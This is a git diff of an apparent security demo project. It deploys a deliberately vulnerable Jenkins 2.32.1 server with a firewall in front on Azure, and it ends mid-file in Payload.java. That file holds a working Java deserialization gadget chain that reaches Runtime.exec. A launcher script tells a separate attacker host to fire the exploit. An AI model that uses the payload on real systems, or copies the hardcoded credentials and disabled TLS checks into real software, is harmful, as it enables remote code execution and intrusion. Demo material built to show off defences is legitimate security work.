+ logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+ if not jobid:
+ logger.info('Got http 200 response but didnt get jobid')
+ time.sleep(30)
+ else:
+ getjobid = 1
+
+ completed = 0
+ while (completed == 0):
+ time.sleep(30)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+ r = send_request(call)
+ tree = ET.fromstring(r.text)
+
+ logger.debug('Got response for show job {}'.format(r.text))
+ if tree.attrib['status'] == 'success':
+ try:
+ if (tree[0][0][5].text == 'FIN'):
+ logger.debug("AV install Status Complete ")
+ completed = 1
+ else:
+ status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete"
+ print('{0}\r'.format(status))
+ except:
+ logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid))
+
+ else:
+ logger.info('Unable to determine job status')
+
+
+def getApiKey(hostname, username, password):
+ '''
+ Generate the API key from username / password
+ '''
+
+ call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password)
+
+ api_key = ""
+ while True:
+ try:
+ # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read()
+ response = send_request(call)
+
+
+ except DeployRequestException as updateerr:
+ logger.info("No response from FW. Wait 20 secs before retry")
+ time.sleep(10)
+ continue
+
+ else:
+ api_key = ET.XML(response.content)[0][0].text
+ logger.info("FW Management plane is Responding so checking if Dataplane is ready")
+ logger.debug("Response to get_api is {}".format(response))
+ return api_key
+
+
+def getFirewallStatus(fwIP, api_key):
+ fwip = fwIP
+
+ """
+ Gets the firewall status by sending the API request show chassis status.
+ :param fwMgtIP: IP Address of firewall interface to be probed
+ :param api_key: Panos API key
+ """
+
+    url = "https://%s/api/?type=op&cmd=<show><chassis-ready></chassis-ready></show>&key=%s" % (fwip, api_key)
+ # Send command to fw and see if it times out or we get a response
+ logger.info("Sending command 'show chassis status' to firewall")
+ try:
+ response = requests.get(url, verify=False, timeout=10)
+ response.raise_for_status()
+ except requests.exceptions.Timeout as fwdownerr:
+ logger.debug("No response from FW. So maybe not up!")
+ return 'no'
+ # sleep and check again?
+ except requests.exceptions.HTTPError as fwstartgerr:
+ '''
+ Firewall may return 5xx error when rebooting. Need to handle a 5xx response
+ raise_for_status() throws HTTPError for error responses
+ '''
+        logger.info("Http Error: {}: ".format(fwstartgerr))
+ return 'cmd_error'
+ except requests.exceptions.RequestException as err:
+ logger.debug("Got RequestException response from FW. So maybe not up!")
+ return 'cmd_error'
+ else:
+ logger.debug("Got response to 'show chassis status' {}".format(response))
+
+ resp_header = ET.fromstring(response.content)
+ logger.debug('Response header is {}'.format(resp_header))
+
+ if resp_header.tag != 'response':
+ logger.debug("Did not get a valid 'response' string...maybe a timeout")
+ return 'cmd_error'
+
+ if resp_header.attrib['status'] == 'error':
+ logger.debug("Got an error for the command")
+ return 'cmd_error'
+
+ if resp_header.attrib['status'] == 'success':
+ # The fw responded with a successful command execution. So is it ready?
+ for element in resp_header:
+ if element.text.rstrip() == 'yes':
+ logger.info("FW Chassis is ready to accept configuration and connections")
+ return 'yes'
+ else:
+ logger.info("FW Chassis not ready, still waiting for dataplane")
+ time.sleep(10)
+ return 'almost'
+
+
+def update_status(key, value):
+ global status_output
+
+ if type(status_output) is not dict:
+ logger.info('Creating new status_output object')
+ status_output = dict()
+
+ if key is not None and value is not None:
+ status_output[key] = value
+
+    # write status to file for future tracking
+ write_status_file(status_output)
+
+
+def write_status_file(message_dict):
+ """
+ Writes the deployment state to a dict and outputs to file for status tracking
+ """
+ try:
+ message_json = json.dumps(message_dict)
+ with open('deployment_status.json', 'w+') as dpj:
+ dpj.write(message_json)
+
+ except ValueError as ve:
+ logger.error('Could not write status file!')
+ print('Could not write status file!')
+ sys.exit(1)
+
+
+def create_azure_fileshare(share_prefix, account_name, account_key):
+ # generate a unique share name to avoid overlaps in shared infra
+
+    # FIXME - Need to remove hardcoded directory link below
+
+ d_dir = './WebInDeploy/bootstrap'
+ share_name = "{0}-{1}".format(share_prefix.lower(), str(uuid.uuid4()))
+ print('using share_name of: {}'.format(share_name))
+
+ # archive_file_path = _create_archive_directory(files, share_prefix)
+
+ try:
+ # ignore SSL warnings - bad form, but SSL Decrypt causes issues with this
+ s = requests.Session()
+ s.verify = False
+
+ file_service = FileService(account_name=account_name, account_key=account_key, request_session=s)
+
+ # print(file_service)
+ if not file_service.exists(share_name):
+ file_service.create_share(share_name)
+
+ for d in ['config', 'content', 'software', 'license']:
+ print('creating directory of type: {}'.format(d))
+ if not file_service.exists(share_name, directory_name=d):
+ file_service.create_directory(share_name, d)
+
+ # FIXME - We only handle bootstrap files. May need to handle other dirs
+
+ if d == 'config':
+ for filename in os.listdir(d_dir):
+ print('creating file: {0}'.format(filename))
+ file_service.create_file_from_path(share_name, d, filename, os.path.join(d_dir, filename))
+
+ except AttributeError as ae:
+ # this can be returned on bad auth information
+ print(ae)
+ return "Authentication or other error creating bootstrap file_share in Azure"
+
+ except AzureException as ahe:
+ print(ahe)
+ return str(ahe)
+ except ValueError as ve:
+ print(ve)
+ return str(ve)
+
+ print('all done')
+ return share_name
+
+
+def getServerStatus(IP):
+ """
+ Gets the server status by sending an HTTP request and checking for a 200 response code
+ """
+ global gcontext
+
+ call = ("http://" + IP + "/")
+ logger.info('URL request is {}'.format(call))
+ # Send command to fw and see if it times out or we get a response
+ count = 0
+ max_count = 15
+ while True:
+ if count < max_count:
+ try:
+ count = count + 1
+ r = send_request(call)
+ except DeployRequestException as e:
+                logger.debug("Got Invalid response {}".format(e))
+ else:
+ logger.info('Jenkins Server responded with HTTP 200 code')
+ return 'server_up'
+ else:
+ break
+ return 'server_down'
+
+
+def main(username, password, rg_name, azure_region):
+ username = username
+ password = password
+
+ WebInBootstrap_vars = {
+ 'RG_Name': rg_name,
+ 'Azure_Region': azure_region
+ }
+
+ WebInDeploy_vars = {
+ 'Admin_Username': username,
+ 'Admin_Password': password,
+ 'Azure_Region': azure_region
+ }
+
+ WebInFWConf_vars = {
+ 'Admin_Username': username,
+ 'Admin_Password': password
+ }
+
+    # Set run_plan to True if you wish to run terraform plan before apply
+ run_plan = False
+ kwargs = {"auto-approve": True}
+
+ # Class Terraform uses subprocess and setting capture_output to True will capture output
+ capture_output = kwargs.pop('capture_output', False)
+
+ if capture_output is True:
+ stderr = subprocess.PIPE
+ stdout = subprocess.PIPE
+ else:
+        # if capture_output is False, then everything will essentially go to stdout and stderr
+ stderr = sys.stderr
+ stdout = sys.stdout
+ start_time = time.asctime()
+ print(f'Starting Deployment at {start_time}\n')
+
+ # Create Bootstrap
+
+ tf = Terraform(working_dir='./WebInBootstrap')
+
+ tf.cmd('init')
+ if run_plan:
+ # print('Calling tf.plan')
+ tf.plan(capture_output=False)
+ return_code1, stdout, stderr = tf.apply(vars=WebInBootstrap_vars, capture_output=capture_output,
+ skip_plan=True, **kwargs)
+
+ resource_group = tf.output('Resource_Group')
+ bootstrap_bucket = tf.output('Bootstrap_Bucket')
+ storage_account_access_key = tf.output('Storage_Account_Access_Key')
+ web_in_bootstrap_output = tf.output()
+
+ logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1))
+
+ update_status('web_in_deploy_stdout', stdout)
+ update_status('web_in_bootstrap_output', web_in_bootstrap_output)
+
+ if return_code1 != 0:
+ logger.info("WebInBootstrap failed")
+        update_status('web_in_bootstrap_status', 'error')
+ update_status('web_in_bootstrap_stderr', stderr)
+ print(json.dumps(status_output))
+ exit(1)
+ else:
+ update_status('web_in_bootstrap_status', 'success')
+
+ share_prefix = 'jenkins-demo'
+
+ share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key)
+
+ WebInDeploy_vars.update({'Storage_Account_Access_Key': storage_account_access_key})
+ WebInDeploy_vars.update({'Bootstrap_Storage_Account': bootstrap_bucket})
+ WebInDeploy_vars.update({'RG_Name': resource_group})
+ WebInDeploy_vars.update({'Attack_RG_Name': resource_group})
+ WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name})
+
+ # Build Infrastructure
+
+ tf = Terraform(working_dir='./WebInDeploy')
+ # print("vars {}".format(WebInDeploy_vars))
+ tf.cmd('init')
+ if run_plan:
+ # print('Calling tf.plan')
+ tf.plan(capture_output=False, var=WebInDeploy_vars)
+
+ return_code1, stdout, stderr = tf.apply(var=WebInDeploy_vars, capture_output=capture_output, skip_plan=True,
+ **kwargs)
+
+ web_in_deploy_output = tf.output()
+
+ logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1))
+
+ update_status('web_in_deploy_stdout', stdout)
+ update_status('web_in_deploy_output', web_in_deploy_output)
+ if return_code1 != 0:
+ logger.info("WebInDeploy failed")
+ update_status('web_in_deploy_status', 'error')
+ update_status('web_in_deploy_stderr', stderr)
+ print(json.dumps(status_output))
+ exit(1)
+ else:
+ update_status('web_in_deploy_status', 'success')
+
+ albDns = tf.output('ALB-DNS')
+ fwMgt = tf.output('MGT-IP-FW-1')
+ nlbDns = tf.output('NLB-DNS')
+ fwMgtIP = tf.output('MGT-IP-FW-1')
+
+ logger.info("Got these values from output \n\n")
+ logger.info("AppGateway address is {}".format(albDns))
+ logger.info("Internal loadbalancer address is {}".format(nlbDns))
+ logger.info("Firewall Mgt address is {}".format(fwMgt))
+
+ #
+ # Check firewall is up and running
+ # #
+
+ api_key = getApiKey(fwMgtIP, username, password)
+
+ while True:
+ err = getFirewallStatus(fwMgtIP, api_key)
+ if err == 'cmd_error':
+ logger.info("Command error from fw ")
+
+ elif err == 'no':
+ logger.info("FW is not up...yet")
+ # print("FW is not up...yet")
+ time.sleep(60)
+ continue
+
+ elif err == 'almost':
+ logger.info("MGT up waiting for dataplane")
+ time.sleep(20)
+ continue
+
+ elif err == 'yes':
+ logger.info("FW is up")
+ break
+
+ logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions')
+ time.sleep(10)
+ fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password)
+ logger.info("Updating firewall with latest content pack")
+
+ update_fw(fwMgtIP, api_key)
+
+ #
+ # Configure Firewall
+ #
+ WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP})
+ tf = Terraform(working_dir='./WebInFWConf')
+ tf.cmd('init')
+ kwargs = {"auto-approve": True}
+
+ logger.info("Applying addtional config to firewall")
+
+ WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt
+
+ if run_plan:
+ tf.plan(capture_output=capture_output, var=WebInFWConf_vars)
+
+ # update initial vars with generated fwMgt ip
+
+ return_code2, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True,
+ var=WebInFWConf_vars, **kwargs)
+
+ web_in_fw_conf_out = tf.output()
+
+ update_status('web_in_fw_conf_output', web_in_fw_conf_out)
+ # update_status('web_in_fw_conf_stdout', stdout)
+
+ logger.debug('Got Return code for deploy WebInFwConf {}'.format(return_code2))
+
+ if return_code2 != 0:
+ logger.error("WebInFWConf failed")
+ update_status('web_in_fw_conf_status', 'error')
+ update_status('web_in_fw_conf_stderr', stderr)
+ print(json.dumps(status_output))
+ exit(1)
+ else:
+ update_status('web_in_fw_conf_status', 'success')
+
+ logger.info("Commit changes to firewall")
+
+ fw.commit()
+ logger.info("waiting for commit")
+ time.sleep(60)
+ logger.info("waiting for commit")
+
+ #
+ # Check Jenkins
+ #
+
+ logger.info('Checking if Jenkins Server is ready')
+
+ # FIXME - add outputs for all 3 dirs
+
+ res = getServerStatus(albDns)
+
+ if res == 'server_up':
+ logger.info('Jenkins Server is ready')
+ logger.info('\n\n ### Deployment Complete ###')
+ logger.info('\n\n Connect to Jenkins Server at http://{}'.format(albDns))
+ else:
+ logger.info('Jenkins Server is down')
+ logger.info('\n\n ### Deployment Complete ###')
+
+ # dump out status to stdout
+ print(json.dumps(status_output))
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Get Terraform Params')
+ parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+ parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+ parser.add_argument('-r', '--resource_group', help='Resource Group', required=True)
+ parser.add_argument('-j', '--azure_region', help='Azure Region', required=True)
+
+ args = parser.parse_args()
+ username = args.username
+ password = args.password
+ resource_group = args.resource_group
+ azure_region = args.azure_region
+
+ main(username, password, resource_group, azure_region)
diff --git a/azure/Jenkins_proj-working/destroy-old.py b/azure/Jenkins_proj-working/destroy-old.py
new file mode 100644
index 00000000..305e8925
--- /dev/null
+++ b/azure/Jenkins_proj-working/destroy-old.py
@@ -0,0 +1,121 @@
+#!/usr/bin/env python3
+"""
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage:
+
+python destroy.py -u <fwusername> -p <fwpassword>
+
+"""
+
+import argparse
+import logging
+
+from python_terraform import Terraform
+
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+logger.setLevel(logging.INFO)
+
+
+def main(username, password):
+ username = username
+ password = password
+
+ WebInDeploy_vars = {
+ 'Admin_Username': username,
+ 'Admin_Password': password
+ }
+
+ WebInBootstrap_vars = {
+ 'Admin_Username': username,
+ 'Admin_Password': password
+ }
+
+ albDns = ''
+ nlbDns = ''
+ fwMgt = ''
+
+    # Set run_plan to True if you wish to run terraform plan before apply
+ run_plan = False
+ deployment_status = {}
+ kwargs = {"auto-approve": True}
+
+ #
+ # Destroy Infrastructure
+ #
+ tf = Terraform(working_dir='./WebInDeploy')
+ rg_name = tf.output('RG_Name')
+
+ attack_rg_name = tf.output('Attacker_RG_Name')
+ logger.info('Got RG_Name {} and Attacker_RG_Name {}'.format(rg_name, attack_rg_name))
+
+ WebInDeploy_vars.update({'RG_Name': rg_name})
+ WebInDeploy_vars.update({'Attack_RG_Name': attack_rg_name})
+
+ if run_plan:
+ print('Calling tf.plan')
+ tf.plan(capture_output=False)
+
+ return_code1, stdout, stderr = tf.cmd('destroy', var=WebInDeploy_vars, capture_output=False, **kwargs)
+ # return_code1 =0
+ print('Got return code {}'.format(return_code1))
+
+ if return_code1 != 0:
+ logger.info("Failed to destroy build ")
+
+ exit()
+ else:
+
+ logger.info("Destroyed WebInDeploy ")
+
+ WebInBootstrap_vars.update({'RG_Name': rg_name})
+ WebInBootstrap_vars.update({'Attack_RG_Name': attack_rg_name})
+
+ tf = Terraform(working_dir='./WebInBootstrap')
+
+ if run_plan:
+ print('Calling tf.plan')
+ tf.plan(capture_output=False)
+
+ return_code1, stdout, stderr = tf.cmd('destroy', var=WebInBootstrap_vars, capture_output=False, **kwargs)
+ # return_code1 =0
+ print('Got return code {}'.format(return_code1))
+
+    if return_code1 != 0:
+        logger.info("Failed to destroy WebInBootstrap")
+        deployment_status = {'WebInDeploy': 'Fail'}
+
+ exit()
+ else:
+ deployment_status = {'WebInDeploy': 'Success'}
+ exit()
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Get Terraform Params')
+ parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+ parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+
+ args = parser.parse_args()
+ username = args.username
+ password = args.password
+
+ main(username, password)
diff --git a/azure/Jenkins_proj-working/destroy.py b/azure/Jenkins_proj-working/destroy.py
new file mode 100644
index 00000000..3bc6b81b
--- /dev/null
+++ b/azure/Jenkins_proj-working/destroy.py
@@ -0,0 +1,125 @@
+
+from azure.cli.core import get_default_cli
+import sys
+import tempfile
+import argparse
+import logging
+import subprocess
+import os
+
+from python_terraform import Terraform
+
+logger = logging.getLogger()
+# handler = logging.StreamHandler()
+# formatter = logging.Formatter('%(levelname)-8s %(message)s')
+# handler.setFormatter(formatter)
+# logger.addHandler(handler)
+logger.setLevel(logging.INFO)
+
+
+#
+# Usage: python destroy.py -u <fwusername> -p <fwpassword>
+#
+
+sys.stderr = sys.stdout
+
+print('Logging in to Azure using device code')
+
+def run_cmd(cmd):
+ subprocess.call('az login', shell=True)
+ res = subprocess.call(cmd, shell=True)
+ print ('Result is {}'.format(res))
+
+
+def delete_file(fpath):
+ if os.path.exists(fpath):
+ try:
+ os.remove(fpath)
+ print ('Removed state file {}'.format(fpath))
+ except Exception as e:
+ print ('Unable to delete the file {} got error {}'.format(fpath, e))
+ else:
+ print('No need to delete {} as it no longer exists'.format(fpath))
+
+def az_cli(args_str):
+ temp = tempfile.TemporaryFile()
+ args = args_str.split()
+ logger.debug('Sending cli command {}'.format(args))
+ code = get_default_cli().invoke(args, None, temp)
+ # temp.seek(0)
+ data = temp.read().strip()
+ temp.close()
+ return [code, data]
+
+def delete_rg(rg_name):
+ logger.info('Deleting resource group {}'.format(rg_name))
+ cmd = 'group delete --name ' + rg_name + ' --yes'
+ code, data = az_cli(cmd)
+ if code == 0:
+        print('Successfully deleted resource group {}'.format(rg_name))
+
+def delete_state_files(working_dir, file_list):
+    """
+    Removes a list of terraform state files from a directory
+    :param working_dir: directory containing the state files
+    :param file_list: list of file names to remove
+    :return: None
+    """
+ for file_name in file_list:
+ fpath = working_dir + file_name
+ if os.path.exists(fpath):
+ delete_file(fpath)
+ else:
+ print('Already deleted file {}'.format(fpath))
+
+def main (username, password):
+ #get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout)
+ #
+ # Destroy Infrastructure
+ #
+ tfstate_file = 'terraform.tfstate'
+ tfstate_files = ['terraform.tfstate', 'terraform.tfstate.backup']
+
+ fpath = './WebInDeploy/' + tfstate_file
+ if os.path.isfile(fpath):
+ tf = Terraform(working_dir='./WebInDeploy')
+ rg_name = tf.output('RG_Name')
+ rg_name1 = tf.output('Attacker_RG_Name')
+ delete_rg_cmd = 'group delete --name ' + rg_name + ' --yes'
+ az_cli(delete_rg_cmd)
+ #
+ # Delete state files WebInDeploy
+ #
+ delete_state_files('./WebInDeploy/', tfstate_files)
+
+
+ fpath = './WebInBootstrap/' + tfstate_file
+ if os.path.isfile(fpath):
+ delete_rg_cmd = 'group delete --name ' + rg_name1 + ' --yes'
+ az_cli(delete_rg_cmd)
+ #
+ # Delete state files WebInBootstrap
+ #
+ delete_state_files('./WebInBootstrap/', tfstate_files)
+
+
+ #
+ # Delete state files WebInFWConf
+ #
+ delete_state_files('./WebInFWConf/', tfstate_files)
+
+
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Get Terraform Params')
+ parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+ parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+ args = parser.parse_args()
+ username = args.username
+ password = args.password
+ # get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout)
+ main(username, password)
diff --git a/azure/Jenkins_proj-working/jenkins/Dockerfile b/azure/Jenkins_proj-working/jenkins/Dockerfile
new file mode 100644
index 00000000..1dea80e9
--- /dev/null
+++ b/azure/Jenkins_proj-working/jenkins/Dockerfile
@@ -0,0 +1,38 @@
+FROM openjdk:8-jdk
+
+MAINTAINER jamie-b
+
+RUN apt-get update && apt-get install -y git curl wget netcat nmap net-tools sudo && rm -rf /var/lib/apt/lists/*
+
+
+ENV JENKINS_HOME /var/jenkins_home
+ENV COPY_REFERENCE_FILE_LOG $JENKINS_HOME/copy_reference_file.log
+
+RUN groupadd -g 1000 jenkins \
+ && useradd -d "$JENKINS_HOME" -u 1000 -g 1000 -m -s /bin/bash jenkins \
+ && adduser jenkins sudo \
+ && echo 'jenkins:jenkins' | chpasswd
+
+ENV TINI_VERSION v0.14.0
+ADD https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/jenkins/tini?raw=true /bin/tini
+RUN chmod +x /bin/tini
+
+ENV JENKINS_VERSION 2.32.1
+RUN set -ex \
+ && [ -e /usr/share/jenkins ] || mkdir -p /usr/share/jenkins \
+ && [ -e /usr/share/jenkins/ref ] || mkdir -p /usr/share/jenkins/ref \
+ && wget https://s3.amazonaws.com/jenkinsploit/jenkins-2-32.war -O /usr/share/jenkins/jenkins.war -q --progress=bar:force:noscroll --show-progress \
+ && chown -R jenkins "$JENKINS_HOME" /usr/share/jenkins/ref
+
+EXPOSE 8080
+EXPOSE 50000
+
+COPY jenkins.sh /usr/local/bin/jenkins.sh
+
+RUN chmod +x /usr/local/bin/jenkins.sh
+
+USER root
+
+ENTRYPOINT ["/bin/tini", "--"]
+
+CMD ["/usr/local/bin/jenkins.sh"]
diff --git a/azure/Jenkins_proj-working/jenkins/config.xml b/azure/Jenkins_proj-working/jenkins/config.xml
new file mode 100644
index 00000000..071c4fb7
--- /dev/null
+++ b/azure/Jenkins_proj-working/jenkins/config.xml
@@ -0,0 +1,35 @@
+
+
+ admin admin
+
+
+ N2ooq1C0iCP+SERJA63imvGjKrB40ORk7hFGe9ItYuT0iVVj/0rJDQKpVBfS6PMq
+
+
+
+
+
+ All
+ false
+ false
+
+
+
+
+
+ default
+
+
+
+
+
+ false
+
+
+ bcrypt:768e02f82c2e957c0aa638bbee6bcc49d5c7f1d8a67d1a838b0945ce144e6e46
+
+
+ admin@admin.com
+
+
+
diff --git a/azure/Jenkins_proj-working/jenkins/docker-compose.yml b/azure/Jenkins_proj-working/jenkins/docker-compose.yml
new file mode 100644
index 00000000..61334042
--- /dev/null
+++ b/azure/Jenkins_proj-working/jenkins/docker-compose.yml
@@ -0,0 +1,11 @@
+version: '3'
+services:
+ jenkins:
+ build: .
+ container_name: jenkins
+ environment:
+      JAVA_OPTS: "-Djava.awt.headless=true -Djenkins.install.runSetupWizard=false"
+ ports:
+ - "50000:50000"
+ - "8080:8080"
diff --git a/azure/Jenkins_proj-working/jenkins/jenkins.sh b/azure/Jenkins_proj-working/jenkins/jenkins.sh
new file mode 100644
index 00000000..b44f6ba2
--- /dev/null
+++ b/azure/Jenkins_proj-working/jenkins/jenkins.sh
@@ -0,0 +1,24 @@
+#! /bin/bash -e
+
+: "${JENKINS_HOME:="/var/jenkins_home"}"
+touch "${COPY_REFERENCE_FILE_LOG}" || { echo "Can not write to ${COPY_REFERENCE_FILE_LOG}. Wrong volume permissions?"; exit 1; }
+echo "--- Copying files at $(date)" >> "$COPY_REFERENCE_FILE_LOG"
+
+# if `docker run` first argument start with `--` the user is passing jenkins launcher arguments
+if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then
+
+ # read JAVA_OPTS and JENKINS_OPTS into arrays
+ java_opts_array=()
+ while IFS= read -r -d '' item; do
+ java_opts_array+=( "$item" )
+ done < <([[ $JAVA_OPTS ]] && xargs printf '%s\0' <<<"$JAVA_OPTS")
+
+ jenkins_opts_array=( )
+ while IFS= read -r -d '' item; do
+ jenkins_opts_array+=( "$item" )
+ done < <([[ $JENKINS_OPTS ]] && xargs printf '%s\0' <<<"$JENKINS_OPTS")
+
+ exec java "${java_opts_array[@]}" -jar /usr/share/jenkins/jenkins.war "${jenkins_opts_array[@]}" "$@"
+fi
+
+exec "$@"
diff --git a/azure/Jenkins_proj-working/jenkins/tini b/azure/Jenkins_proj-working/jenkins/tini
new file mode 100644
index 00000000..4e5b36a9
Binary files /dev/null and b/azure/Jenkins_proj-working/jenkins/tini differ
diff --git a/azure/Jenkins_proj-working/launch_attack_vector.py b/azure/Jenkins_proj-working/launch_attack_vector.py
new file mode 100644
index 00000000..dce17b39
--- /dev/null
+++ b/azure/Jenkins_proj-working/launch_attack_vector.py
@@ -0,0 +1,72 @@
+#!/usr/bin/env python3
+
+import requests
+import argparse
+from python_terraform import Terraform
+import json
+import sys
+
+
+def get_terraform_outputs() -> dict:
+ tf = Terraform(working_dir='./WebInDeploy')
+ rc, out, err = tf.cmd('output', '-json')
+
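+    # The parsed outputs mirror the shape recorded in deployment_status.json, e.g. (illustrative):
+    #   {"ALB-DNS": {"value": "....cloudapp.azure.com", "type": "string", "sensitive": false}, ...}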
+    if rc == 0:
+        try:
+            return json.loads(out)
+        except ValueError as ve:
+            print('Could not parse terraform outputs!')
+    # terraform failed or its output could not be parsed
+    return dict()
+
+
+def main(attack_vector: str) -> None:
+
+    print('Attempting to launch exploit...\n')
+    outputs = get_terraform_outputs()
+    print(outputs)
+
+    if 'ATTACKER_IP' not in outputs:
+        print('No attacker ip found in tf outputs!')
+        sys.exit(1)
+
+    if attack_vector == 'native':
+        print('Using native waf protected attack vector...\n')
+        target = outputs['NATIVE-DNS']['value']
+    elif attack_vector == 'panos':
+        print('Using PAN-OS protected attack vector...\n')
+        target = outputs['ALB-DNS']['value']
+    else:
+        print('Unknown attack vector - use "native" or "panos"!')
+        target = '127.0.0.1'
+
+    attacker = outputs['ATTACKER_IP']['value']
+    payload = dict()
+    payload['attacker'] = attacker
+    payload['target'] = target
+
+    headers = dict()
+    headers['Content-Type'] = 'application/json'
+    headers['Accept'] = '*/*'
+
+    try:
+        resp = requests.post(f'http://{attacker}:5000/launch', data=json.dumps(payload), headers=headers)
+        if resp.status_code == 200:
+            print('Exploit Successfully Launched!\n')
+            print(resp.text)
+            sys.exit(0)
+        else:
+            print('Could not Launch Exploit!\n')
+            print(resp.text)
+            sys.exit(1)
+    except requests.exceptions.ConnectionError:
+        print('Could not connect to attacker instance!')
+        sys.exit(1)
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Launch Jenkins Attack CnC')
+ parser.add_argument('-c', '--vector', help='Attack Vector', required=True)
+
+ args = parser.parse_args()
+ vector = args.vector
+
+ main(vector)
+
diff --git a/azure/Jenkins_proj-working/payload/Payload.java b/azure/Jenkins_proj-working/payload/Payload.java
new file mode 100644
index 00000000..cbd4c8b5
--- /dev/null
+++ b/azure/Jenkins_proj-working/payload/Payload.java
@@ -0,0 +1,189 @@
+import java.io.FileOutputStream;
+import java.io.ObjectOutputStream;
+import java.io.ObjectStreamException;
+import java.io.Serializable;
+import java.lang.reflect.Field;
+import java.security.KeyPair;
+import java.security.KeyPairGenerator;
+import java.security.PrivateKey;
+import java.security.PublicKey;
+import java.security.Signature;
+import java.security.SignedObject;
+import java.util.Comparator;
+import java.util.HashMap;
+import java.util.HashSet;
+import java.util.Map;
+import java.util.concurrent.ConcurrentSkipListSet;
+import java.util.concurrent.CopyOnWriteArraySet;
+
+import net.sf.json.JSONArray;
+
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.collection.AbstractCollectionDecorator;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.keyvalue.TiedMapEntry;
+import org.apache.commons.collections.map.LazyMap;
+import org.apache.commons.collections.map.ReferenceMap;
+import org.apache.commons.collections.set.ListOrderedSet;
+
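+/*
+ * Serializable payload object: when deserialized on a classpath containing
+ * commons-collections and json-lib, the nested collections built in setup()
+ * drive the ChainedTransformer below, which ultimately calls
+ * Runtime.getRuntime().exec(cmd) via the LazyMap/TiedMapEntry gadget.
+ */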
+public class Payload implements Serializable {
+
+ private Serializable payload;
+
+ public Payload(String cmd) throws Exception {
+
+ this.payload = this.setup(cmd);
+
+ }
+
+ public Serializable setup(String cmd) throws Exception {
+ final String[] execArgs = new String[] { cmd };
+
+ final Transformer[] transformers = new Transformer[] {
+ new ConstantTransformer(Runtime.class),
+ new InvokerTransformer("getMethod", new Class[] { String.class,
+ Class[].class }, new Object[] { "getRuntime",
+ new Class[0] }),
+ new InvokerTransformer("invoke", new Class[] { Object.class,
+ Object[].class }, new Object[] { null, new Object[0] }),
+ new InvokerTransformer("exec", new Class[] { String.class },
+ execArgs), new ConstantTransformer(1) };
+
+ Transformer transformerChain = new ChainedTransformer(transformers);
+
+ final Map innerMap = new HashMap();
+
+ final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
+
+ TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
+
+ HashSet map = new HashSet(1);
+ map.add("foo");
+ Field f = null;
+ try {
+ f = HashSet.class.getDeclaredField("map");
+ } catch (NoSuchFieldException e) {
+ f = HashSet.class.getDeclaredField("backingMap");
+ }
+
+ f.setAccessible(true);
+ HashMap innimpl = (HashMap) f.get(map);
+
+ Field f2 = null;
+ try {
+ f2 = HashMap.class.getDeclaredField("table");
+ } catch (NoSuchFieldException e) {
+ f2 = HashMap.class.getDeclaredField("elementData");
+ }
+
+ f2.setAccessible(true);
+ Object[] array2 = (Object[]) f2.get(innimpl);
+
+ Object node = array2[0];
+ if (node == null) {
+ node = array2[1];
+ }
+
+ Field keyField = null;
+ try {
+ keyField = node.getClass().getDeclaredField("key");
+ } catch (Exception e) {
+ keyField = Class.forName("java.util.MapEntry").getDeclaredField(
+ "key");
+ }
+
+ keyField.setAccessible(true);
+ keyField.set(node, entry);
+
+ KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA");
+ keyPairGenerator.initialize(1024);
+ KeyPair keyPair = keyPairGenerator.genKeyPair();
+ PrivateKey privateKey = keyPair.getPrivate();
+ PublicKey publicKey = keyPair.getPublic();
+
